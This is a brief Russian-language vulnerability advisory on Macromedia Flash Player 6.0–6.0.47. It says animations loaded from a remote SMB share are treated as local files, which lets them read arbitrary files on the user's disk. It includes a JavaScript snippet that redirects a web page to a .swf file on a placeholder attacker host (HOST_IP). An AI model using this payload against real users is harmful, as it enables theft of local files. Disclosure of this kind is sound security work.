Ошибка, обнаруженная в Flash player, позволяет Flash
анимациям читать произвольные локальные файлы.
Уязвимость происходит из-за ошибки в Flash Player при загрузке
анимации от удаленных SMB ресурсов. Когда Flash Player загружает анимацию от сетевого SMB ресурса,
он обрабатывается ее так, как если бы была загружена с локального жесткого диска пользователя. Уязвимость может использоваться через Web страницу, содержащую
следующий код:
<script language="javascript">
document.location.href='\\\\HOST_IP\\exploit\\read.swf';
</script>
Уязвимость обнаружена в Macromedia Flash 6.0-6.0.47.
